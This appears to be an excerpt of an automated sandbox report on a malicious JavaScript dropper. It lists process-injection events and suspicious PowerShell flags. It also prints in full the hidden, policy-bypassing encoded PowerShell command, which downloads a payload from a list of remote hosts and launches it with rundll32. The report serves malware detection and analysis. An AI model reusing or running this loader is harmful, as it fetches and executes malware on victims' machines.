AdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEcAOABBAGIAZwBCAGwAQQBIAE0AQQBSAHcAQgB2AEEASABNAEEAYQBBAEIAbABBAEcANABBAGEAUQBCADAAQQBHAFUAQQBMAGcAQgAxAEEARwA0AEEAYQBRAEIAdQBBAEcAZwBBAGEAUQBCAGkAQQBHAGsAQQBkAEEAQgBsAEEARwBRAEEAYgBBAEIANQBBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBaAFEAQgB1AEEARwA4AEEAYgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAWgBlAG4AaQB0AGgAdwBhAHIAZABDAG8AbAB1AG0AYgBpAGQAYQBlACAAPQAgACIAYwBvAGwAbABlAGMAdABpAGIAaQBsAGkAdAB5AFMAZQBtAGkAcABhAHIAbwBjAGgAaQBhAGwAIgA7ACQAcwB1AGIAbABhAG4AZwB1AGEAZwBlAEgAbwBwAGUAaQB0AGUAIAA9ACAANgAyADQAOwAkAHMAaQBsAHYAZQByAGUAeQBlAE8AcgBnAGEAbgBpAGYAeQAgAD0AIAAiAGMAaABhAGMAawBlAHIAVgBpAGcAaQBsAHMAIgA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAHIAaQBnAGgAdABlAHIAcwBIAGkAdgBlAHcAYQByAGQAIAA9ACAAMwAwADQAOwAkAGkAbgB0AGUAcgBuAHUAbgBjAGkAYQBsAGwAeQBBAHMAcwBhAGkAbAAgAD0AIAA3ADEANAA7ACQAVQBuAGEAYwBjAGUAcAB0AGEAYgBsAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AdwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAegBBAEQAZwBBAEwAZwBBAHkAQQBEAE0AQQBPAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABBAEEAYwBnAEIAdgBBAEcANABBAGQAUQBCAHUAQQBHAE0AQQBhAFEAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAEQAQQBHAHcAQQBiAHcAQgAwAEEASABVAEEAYwBnAEIAbABBAEgATQBBAEwAZwBCAGkAQQBIAEkAQQAiADsAfQB9ACQAdQBuAG4AYQB1AHQAaQBjAGEAbABFAHgAcABlAHIAaQBtAGUAbgB0AGkAbgBnACAAPQAgACIAcABsAGUAbgBpAHMAbQAiADsAQQBuAGcAdQBsAGEAcgA7AA=="
parent_process	wscript.exe	martian_process	powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABVAG4AZABlAHIAcwBoAHIAdQBiAHMATwB2AGUAcgByAHUAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBlAEEAQgA1AEEASABBAEEAYwBnAEIAdgBBAEcAdwBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAZABRAEIAdwBBAEcAOABBAGIAZwBCAHoAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMQBBAEMANABBAE4AZwBBADAAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAFUAQQBjAHcAQgBwAEEASABNAEEAWgBRAEIAegBBAEYAUQBBAGEAQQBCAGgAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAdwBBAFkAUQBCAGoAQQBHAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAzADsAJAB1AG4AZABlAHIAawBpAG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBZAFEAQgBrAEEARwAwAEEAYQBRAEIAdQBBAEcAawBBAGMAdwBCADAAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAZABnAEIAbABBAEcAdwBBAGUAUQBCAFUAQQBIAEkAQQBiAHcAQgB3AEEARwBnAEEAYgB3AEIAdQBBAEgAVQBBAFkAdwBCAHMAQQBHAFUAQQBkAFEAQgB6AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATQBRAEEAeQBBAEEAPQA9ACIAOwAkAGQAZQB4AHQAcgBvAGwAaQBtAG8AbgBlAG4AZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBNAEEAQQB3AEEAQQA9AD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBRAEEAdQBBAEQARQBBAE4AZwBBADIAQQBDADQAQQBNAGcAQQAxAEEARABBAEEATABnAEEAeABBAEQAawBBAE4AUQBBAD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAegBBAEgAVQBBAGIAUQBCAHQAQQBHAEUAQQBkAEEAQgBsAEEARwB3AEEAZQBRAEIAUQBBAEcAZwBBAFkAUQBCAHkAQQBIAGsAQQBiAGcAQgBuAEEARwA4AEEAYwBBAEIAaABBAEgASQBBAFkAUQBCAHMAQQBIAGsAQQBjAHcAQgBwAEEASABNAEEATABnAEIAegBBAEcAVQBBAGUAQQBCADUAQQBBAD0APQB3AFkAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATQBnAEEAdwBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQAiADsAJABzAHcAZQB2AGUAbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBBAD0APQAiADsAJABCAHIAZQBhAGsAZgBhAHMAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBADEAQQBEAFEAQQBMAHcAQQA1AEEARQBjAEEAVQBRAEEAMQBBAEUARQBBAE8AQQBBAHYAQQBFAHMAQQBSAEEAQgB6AEEARgBrAEEAYgB3AEIAYQBBAEgATQBBAFQAUQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAGcAQQA1AEEARABFAEEATAB3AEIAWQBBAEcANABBAFoAQQBBAHYAQQBIAG8AQQBhAGcAQgBaAEEARQBJAEEAVwBBAEEAMABBAEcANABBAFoAQQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBRAGcAQgBUAEEARgBjAEEAVABRAEIAMgBBAEUAZwBBAGUAQQBCADIAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAHIAbwB3AGUAZABFAGMAdABvAHoAbwBvAG4AIABpAG4AIAAkAEIAcgBlAGEAawBmAGEAcwB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAGYAIgApACAAewAkAG4AbwBzAG8AbQBhAG4AaQBhAEQAZQBwAHUAcgBnAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCAHUAQQBIAFEAQQBZAFEAQgBtAEEARwB3AEEAZABRAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBSAEEAQgAxAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBaAHcAQgB6AEEAQQA9AD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAHcAQQAyAEEAQQA9AD0AIgA7ACQAUAByAG8AdABlAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADIAQQBDADQAQQBNAFEAQQAwAEEARABnAEEATABnAEEAeQBBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAQgBhAGcAdwB5AG4ARABvAGcAZgBpAHMAaABlAHMAIAA9ACAANAA2ADYAOwB0AHIAeQAgAHsAJAB2AGkAYgByAGEAdABvAHIAcwBJAG8AbgBpAGMAaQB6AGUAIAA9ACAAMgAwADUAOwAkAGMAbwB3AGgAaQBkAGUAcwAgAD0AIAA5ADUAMwA7ACQAQQBsAGEAbgBnAGkAbgBlAE8AdgBlAHIAaQBuAHQAZQBuAHMAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQAyAEEARABVAEEAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBiAEEAQgBoAEEARwA0AEEAWgB3AEIANQBBAEMANABBAGIAQQBCADAAQQBHAFEAQQAiADsAJABDAHkAbgBnAGgAYQBuAGUAZABkAFQAcgBpAGEAbgBnAHUAbABhAHIAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAcgBvAHcAZQBkAEUAYwB0AG8AegBvAG8AbgApACkAOwBpAHcAcgAgACQAQwB5AG4AZwBoAGEAbgBlAGQAZABUAHIAaQBhAG4AZwB1AGwAYQByAGkAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdQBsAHAAaABvAG4AZQBzAEcAbwBzAGgAZQBuAGkAdABlAC4AdQBuAGkAbgBoAGkAYgBpAHQAZQBkAGwAeQBWAGUAcgBiAGUAbgBvAGwAOwAkAHAAdQBsAGwAYQBiAGwAZQAgAD0AIAAiAHAAcgBlAGUAeABjAGwAdQBzAGkAdgBlAGwAeQBQAGkAdAB0AGkAbgBnACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB1AGwAcABoAG8AbgBlAHMARwBvAHMAaABlAG4AaQB0AGUALgB1AG4AaQBuAGgAaQBiAGkAdABlAGQAbAB5AFYAZQByAGIAZQBuAG8AbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMwAxADkAMgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEcAOABBAGIAZwBCAGwAQQBIAE0AQQBSAHcAQgB2AEEASABNAEEAYQBBAEIAbABBAEcANABBAGEAUQBCADAAQQBHAFUAQQBMAGcAQgAxAEEARwA0AEEAYQBRAEIAdQBBAEcAZwBBAGEAUQBCAGkAQQBHAGsAQQBkAEEAQgBsAEEARwBRAEEAYgBBAEIANQBBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBaAFEAQgB1AEEARwA4AEEAYgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAWgBlAG4AaQB0AGgAdwBhAHIAZABDAG8AbAB1AG0AYgBpAGQAYQBlACAAPQAgACIAYwBvAGwAbABlAGMAdABpAGIAaQBsAGkAdAB5AFMAZQBtAGkAcABhAHIAbwBjAGgAaQBhAGwAIgA7ACQAcwB1AGIAbABhAG4AZwB1AGEAZwBlAEgAbwBwAGUAaQB0AGUAIAA9ACAANgAyADQAOwAkAHMAaQBsAHYAZQByAGUAeQBlAE8AcgBnAGEAbgBpAGYAeQAgAD0AIAAiAGMAaABhAGMAawBlAHIAVgBpAGcAaQBsAHMAIgA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAHIAaQBnAGgAdABlAHIAcwBIAGkAdgBlAHcAYQByAGQAIAA9ACAAMwAwADQAOwAkAGkAbgB0AGUAcgBuAHUAbgBjAGkAYQBsAGwAeQBBAHMAcwBhAGkAbAAgAD0AIAA3ADEANAA7ACQAVQBuAGEAYwBjAGUAcAB0AGEAYgBsAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AdwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAegBBAEQAZwBBAEwAZwBBAHkAQQBEAE0AQQBPAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABBAEEAYwBnAEIAdgBBAEcANABBAGQAUQBCAHUAQQBHAE0AQQBhAFEAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAEQAQQBHAHcAQQBiAHcAQgAwAEEASABVAEEAYwBnAEIAbABBAEgATQBBAEwAZwBCAGkAQQBIAEkAQQAiADsAfQB9ACQAdQBuAG4AYQB1AHQAaQBjAGEAbABFAHgAcABlAHIAaQBtAGUAbgB0AGkAbgBnACAAPQAgACIAcABsAGUAbgBpAHMAbQAiADsAQQBuAGcAdQBsAGEAcgA7AA=="
parent_process	wscript.exe	martian_process	wscript "C:\Users\test22\AppData\Local\Temp\Pzbrjg.js" ApetalousnessTheriomorph Anisoin MultimetallicSemiweekly labionasalBeshell
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Pzbrjg.js" ApetalousnessTheriomorph Anisoin MultimetallicSemiweekly labionasalBeshell

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1696 resumed a thread in remote process 2160
Process injection	Process 2160 resumed a thread in remote process 2280
NtResumeThread May 18, 2023, 9:25 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2160	1	0	0
NtResumeThread May 18, 2023, 9:25 a.m.	thread_handle: 0x00000304 suspend_count: 1 process_identifier: 2280	1	0	0

Creates a suspicious Powershell process (8 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Pzbrjg.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All